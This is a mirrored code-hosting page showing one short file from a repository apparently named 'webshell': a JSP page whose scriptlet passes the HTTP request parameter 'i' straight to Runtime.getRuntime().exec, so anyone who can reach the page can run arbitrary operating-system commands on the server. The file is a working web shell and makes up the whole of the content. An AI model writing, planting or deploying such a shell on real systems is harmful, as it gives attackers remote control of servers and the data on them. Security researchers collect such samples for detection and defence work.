mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
7 lines
239 B
Text
7 lines
239 B
Text
|
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
|
||
|
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
|
||
|
<jsp:scriptlet>
|
||
|
Runtime.getRuntime().exec(request.getParameter("i"));
|
||
|
</jsp:scriptlet>
|
||
|
</jsp:root>
|